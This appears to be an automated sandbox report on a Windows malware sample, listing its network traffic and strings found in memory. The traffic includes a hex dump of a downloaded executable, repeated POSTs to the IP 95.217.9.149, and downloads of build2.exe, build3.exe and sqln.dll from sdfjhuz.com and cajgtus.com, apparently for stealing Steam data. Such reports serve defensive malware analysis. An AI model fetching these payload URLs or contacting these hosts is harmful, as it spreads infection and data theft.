00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 24 Apr 2024 08:27:32 GMTServer: Apache/2.4.37 (Win64) PHP/5.6.40Last-Modified: Mon, 09 Oct 2023 19:50:06 GMTETag: "4ae00-6074de5a4a562"Accept-Ranges: bytesContent-Length: 306688Connection: closeContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 36 f8 06 6b 72 99 68 38 72 99 68 38 72 99 68 38 cf d6 fe 38 73 99 68 38 6c cb fd 38 6e 99 68 38 6c cb eb 38 fc 99 68 38 55 5f 13 38 7b 99 68 38 72 99 69 38 c9 99 68 38 6c cb ec 38 32 99 68 38 6c cb fc 38 73 99 68 38 6c cb f9 38 73 99 68 38 52 69 63 68 72 99 68 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 0e d2 b9 61 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 6a 03 00 00 98 3b 00 00 00 00 00 20 05 01 00 00 10 00 00 00 80 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 c0 3e 00 00 04 00 00 b0 bf 04 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 6c 68 03 00 64 00 00 00 00 90 3e 00 00 2f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 13 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 b8 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 b8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 72 68 03 00 00 10 00 00 00 6a 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 a8 ff 3a 00 00 80 03 00 00 0e 01 00 00 6e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6b 69 63 00 00 00 00 05 00 00 00 00 80 3e 00 00 02 00 00 00 7c 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 00 2f 00 00 00 90 3e 00 00 30 00 00 00 7e 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: GET /profiles/76561199673019888 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
Source: Joe Sandbox View IP Address: 95.217.9.149 95.217.9.149
Source: Joe Sandbox View IP Address: 104.21.65.24 104.21.65.24
Source: Joe Sandbox View IP Address: 175.119.10.231 175.119.10.231
Source: Joe Sandbox View ASN Name: UninetSAdeCVMX UninetSAdeCVMX
Source: Joe Sandbox View JA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.9.149Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JKFIDGDHJEGIEBFHDGDGUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.9.149Content-Length: 279Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GDAEBKJDHDAFIECBAKKJUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.9.149Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IJKJJKFHIJKKFHJJECBAUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.9.149Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GIJJKFCGDGHDHIECGCBKUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.9.149Content-Length: 7497Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /sqln.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.9.149Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----ECBAEBGHDAECBGDGCAKEUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.9.149Content-Length: 4677Connection: Keep-AliveCache-Control: no-cache
Source: unknown TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 1_2_0040CF10 _memset,InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle, 1_2_0040CF10
Source: global traffic HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic HTTP traffic detected: GET /profiles/76561199673019888 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.9.149Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic HTTP traffic detected: GET /sqln.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.9.149Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic HTTP traffic detected: GET /dl/build2.exe HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: sdfjhuz.com
Source: global traffic HTTP traffic detected: GET /test2/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=true HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: cajgtus.com
Source: global traffic HTTP traffic detected: GET /test2/get.php?pid=F8AFCDC4E800A3319FFB343E83099637 HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: cajgtus.com
Source: global traffic HTTP traffic detected: GET /files/1/build3.exe HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: cajgtus.com
Source: build2.exe, 00000008.00000003.1852670646.0000000000928000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1888221528.0000000000950000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1870400492.0000000000928000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: /login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com ht equals www.youtube.com (Youtube)
Source: build2.exe, 00000008.00000003.1805735818.000000000092F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: SUwX12D2S6.exe, 00000004.00000003.1778859571.00000000097F0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: URL=http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: SUwX12D2S6.exe, 00000004.00000003.1779071628.00000000097F0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: URL=http://www.twitter.com/ equals www.twitter.com (Twitter)
Source: SUwX12D2S6.exe, 00000004.00000003.1779207365.00000000097F0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: URL=http://www.youtube.com/ equals www.youtube.com (Youtube)
Source: unknown DNS traffic detected: queries for: api.2ip.ua
Source: unknown HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JKFIDGDHJEGIEBFHDGDGUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.9.149Content-Length: 279Connection: Keep-AliveCache-Control: no-cache
Source: build2.exe, 00000008.00000003.1852670646.0000000000928000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1805735818.000000000092F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1888221528.0000000000950000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1870400492.0000000000928000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://127.0.0.1:27060
Source: SUwX12D2S6.exe, 00000004.00000002.2244414394.0000000000868000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cajgtus.com/files/1/build3.exe
Source: SUwX12D2S6.exe, 00000004.00000002.2244414394.0000000000868000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cajgtus.com/files/1/build3.exe$run
Source: SUwX12D2S6.exe, 00000004.00000002.2244414394.0000000000868000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cajgtus.com/files/1/build3.exe$runinstall020921_delay721_sec.exe0D
Source: SUwX12D2S6.exe, 00000004.00000002.2245822079.0000000003102000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2242434327.0000000003102000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cajgtus.com/files/1/build3.exeg
Source: SUwX12D2S6.exe, 00000004.00000002.2244414394.0000000000868000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cajgtus.com/files/1/build3.exerun
Source: SUwX12D2S6.exe, 00000004.00000002.2245822079.0000000003102000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2242434327.0000000003102000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cajgtus.com/files/1/build3.exeug
Source: SUwX12D2S6.exe, 00000004.00000002.2244414394.00000000008C1000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000006.00000002.4130188988.0000000000767000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000006.00000002.4130188988.00000000007B3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cajgtus.com/test2/get.php
Source: SUwX12D2S6.exe, 00000006.00000002.4130188988.0000000000767000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000006.00000002.4130188988.00000000007B3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cajgtus.com/test2/get.php?pid=F8AFCDC4E800A3319FFB343E83099637
Source: SUwX12D2S6.exe, 00000004.00000002.2244414394.0000000000828000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cajgtus.com/test2/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=true
Source: SUwX12D2S6.exe, 00000004.00000002.2244414394.0000000000828000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cajgtus.com/test2/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=trueG
Source: SUwX12D2S6.exe, 00000006.00000002.4130188988.0000000000767000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cajgtus.com/test2/get.php?pid=F8AFCDC4E800A3319FFB343E83099637eAa
Source: SUwX12D2S6.exe, 00000004.00000003.1792498139.00000000097F0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr
Source: SUwX12D2S6.exe, 00000000.00000002.1676946978.0000000005E10000.00000040.00001000.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000001.00000002.1694613073.0000000000400000.00000040.00000400.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000003.00000002.1701674378.0000000005DE0000.00000040.00001000.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000002.2243904603.0000000000400000.00000040.00000400.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000005.00000002.1719252737.0000000005E60000.00000040.00001000.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000006.00000002.4129272399.0000000000400000.00000040.00000400.00020000.00000000.sdmp, SUwX12D2S6.exe, 0000000B.00000002.1848123271.0000000005E70000.00000040.00001000.00020000.00000000.sdmp, SUwX12D2S6.exe, 0000000C.00000002.1864325643.0000000000400000.00000040.00000400.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000017.00000002.2105470149.0000000005ED0000.00000040.00001000.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000018.00000002.2116911139.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/Error
Source: SUwX12D2S6.exe, 00000004.00000002.2244414394.00000000008C1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://schemas.mic
Source: SUwX12D2S6.exe, 00000004.00000002.2244414394.00000000008C1000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000002.2244414394.0000000000868000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://sdfjhuz.com/dl/build2.exe
Source: SUwX12D2S6.exe, 00000004.00000002.2244414394.0000000000868000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://sdfjhuz.com/dl/build2.exe$run
Source: SUwX12D2S6.exe, 00000004.00000002.2244414394.0000000000868000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://sdfjhuz.com/dl/build2.exerun
Source: build2.exe, 00000008.00000003.1852670646.0000000000928000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1888221528.0000000000950000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1870400492.0000000000928000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.1967987129.0000000000950000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: build2.exe, 00000008.00000003.1852670646.0000000000928000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1888221528.0000000000950000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1870400492.0000000000928000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.1967987129.0000000000950000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: build2.exe, 00000008.00000003.1852670646.0000000000928000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1888221528.0000000000950000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1870400492.0000000000928000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.1967987129.0000000000950000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: SUwX12D2S6.exe, 00000004.00000003.1778741308.00000000097F0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.amazon.com/
Source: SUwX12D2S6.exe, 00000004.00000003.1778916940.00000000097F0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.google.com/
Source: SUwX12D2S6.exe, 00000004.00000003.1778967819.00000000097F0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.live.com/
Source: SUwX12D2S6.exe, 00000006.00000003.1779158396.0000000003590000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.nytimes.com/
Source: SUwX12D2S6.exe, 00000018.00000002.2116911139.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://www.openssl.org/support/faq.html
Source: SUwX12D2S6.exe, 00000004.00000003.1779020093.00000000097F0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.reddit.com/
Source: build2.exe, 00000008.00000002.1970716529.0000000020E29000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.1970386544.000000001E91D000.00000002.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: SUwX12D2S6.exe, 00000004.00000003.1779071628.00000000097F0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.twitter.com/
Source: build2.exe, 00000008.00000003.1852670646.0000000000928000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1852670646.0000000000921000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1888221528.0000000000950000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.1966489860.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1870400492.0000000000928000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.1967987129.0000000000950000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: SUwX12D2S6.exe, 00000004.00000003.1779153652.00000000097F0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.wikipedia.com/
Source: SUwX12D2S6.exe, 00000004.00000003.1779207365.00000000097F0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.youtube.com/
Source: build2.exe, 00000008.00000002.1967987129.0000000000950000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://95.217.9.149
Source: build2.exe, 00000008.00000002.1967987129.0000000000950000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://95.217.9.149/
Source: build2.exe, 00000008.00000002.1967987129.0000000000950000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://95.217.9.149/2
Source: build2.exe, 00000008.00000002.1967987129.0000000000950000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://95.217.9.149/C
Source: build2.exe, 00000008.00000003.1852670646.0000000000928000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1888221528.0000000000950000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1870400492.0000000000928000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.1967987129.0000000000950000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://95.217.9.149/T
Source: build2.exe, 00000008.00000002.1967987129.00000000008F8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://95.217.9.149/V
Source: build2.exe, 00000008.00000002.1967987129.0000000000950000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://95.217.9.149/_u
Source: build2.exe, 00000008.00000003.1852670646.0000000000928000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1870400492.0000000000928000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://95.217.9.149/a
Source: build2.exe, 00000008.00000002.1967987129.0000000000950000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://95.217.9.149/ets
Source: build2.exe, 00000008.00000003.1852670646.0000000000928000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://95.217.9.149/f
Source: build2.exe, 00000008.00000002.1967987129.0000000000950000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://95.217.9.149/hp
Source: build2.exe, 00000008.00000003.1852670646.0000000000928000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://95.217.9.149/m
Source: build2.exe, 00000008.00000002.1967987129.0000000000950000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://95.217.9.149/pet
Source: build2.exe, 00000008.00000002.1966489860.0000000000514000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000008.00000002.1967987129.0000000000913000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1914285803.0000000000999000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://95.217.9.149/sqln.dll
Source: build2.exe, 00000008.00000002.1967987129.0000000000913000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://95.217.9.149/sqln.dll5
Source: build2.exe, 00000008.00000002.1967987129.0000000000950000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://95.217.9.149/sqln.dllne
Source: build2.exe, 00000008.00000003.1852670646.0000000000928000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1888221528.0000000000950000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1870400492.0000000000928000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://95.217.9.149/t
Source: build2.exe, 00000008.00000002.1967987129.00000000008F8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://95.217.9.149/u
Source: build2.exe, 00000008.00000003.1888221528.0000000000950000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1870400492.0000000000928000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://95.217.9.149/x
Source: build2.exe, 00000008.00000002.1966489860.00000000005F1000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://95.217.9.1490.5938.132
Source: build2.exe, 00000008.00000002.1966489860.000000000051A000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://95.217.9.149CGCBK
Source: build2.exe, 00000008.00000002.1966489860.0000000000558000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://95.217.9.149PUA4832FF8~YAAQLwwtFycGjvGKAQAAIGQc
Source: build2.exe, 00000008.00000002.1966489860.0000000000558000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://95.217.9.149a
Source: SUwX12D2S6.exe, 00000004.00000003.1783890640.00000000097F0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://activity.windows.com
Source: SUwX12D2S6.exe, 00000004.00000003.1712281637.000000000087B000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000006.00000002.4130188988.0000000000767000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 0000000C.00000002.1864753840.00000000007D5000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 0000000C.00000003.1863989873.00000000007D3000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000018.00000002.2117893429.0000000000714000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.2ip.ua/
Source: SUwX12D2S6.exe, 00000001.00000002.1695073196.0000000000847000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.2ip.ua/0
Source: SUwX12D2S6.exe, 0000000C.00000002.1864753840.00000000007D5000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 0000000C.00000003.1863989873.00000000007D3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.2ip.ua/L
